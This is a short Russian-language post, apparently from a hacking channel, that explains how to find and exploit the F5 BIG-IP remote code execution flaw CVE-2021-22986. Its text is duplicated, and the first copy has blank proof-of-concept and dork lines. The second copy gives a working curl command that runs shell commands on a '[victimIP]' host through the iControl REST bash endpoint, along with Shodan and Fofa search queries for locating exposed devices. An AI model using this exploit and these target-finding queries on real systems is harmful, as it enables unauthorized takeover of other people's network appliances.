🩸 Находим и эксплуатируем F5 BIG-IP RCE (CVE-2021-22986)
Обнаруженная недавно уязвимость позволяет злоумышленникам без аутентификации с сетевым доступом к интерфейсу iControl REST через интерфейс управления BIG-IP выполнять произвольные системные команды, создавать или удалять файлы, а также отключать службы.
Уязвимость может привести к полной компрометации системы. Система BIG-IP в режиме Appliance также уязвима.
PoC:
Дорк для Shodan:
Дорк для Fofa:
#web #cve
Обнаруженная недавно уязвимость позволяет злоумышленникам без аутентификации с сетевым доступом к интерфейсу iControl REST через интерфейс управления BIG-IP выполнять произвольные системные команды, создавать или удалять файлы, а также отключать службы.
Уязвимость может привести к полной компрометации системы. Система BIG-IP в режиме Appliance также уязвима.
PoC:
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
Дорк для Shodan:
http.title:"BIG-IP"
Дорк для Fofa:
app="F5-BIGIP"
#web #cve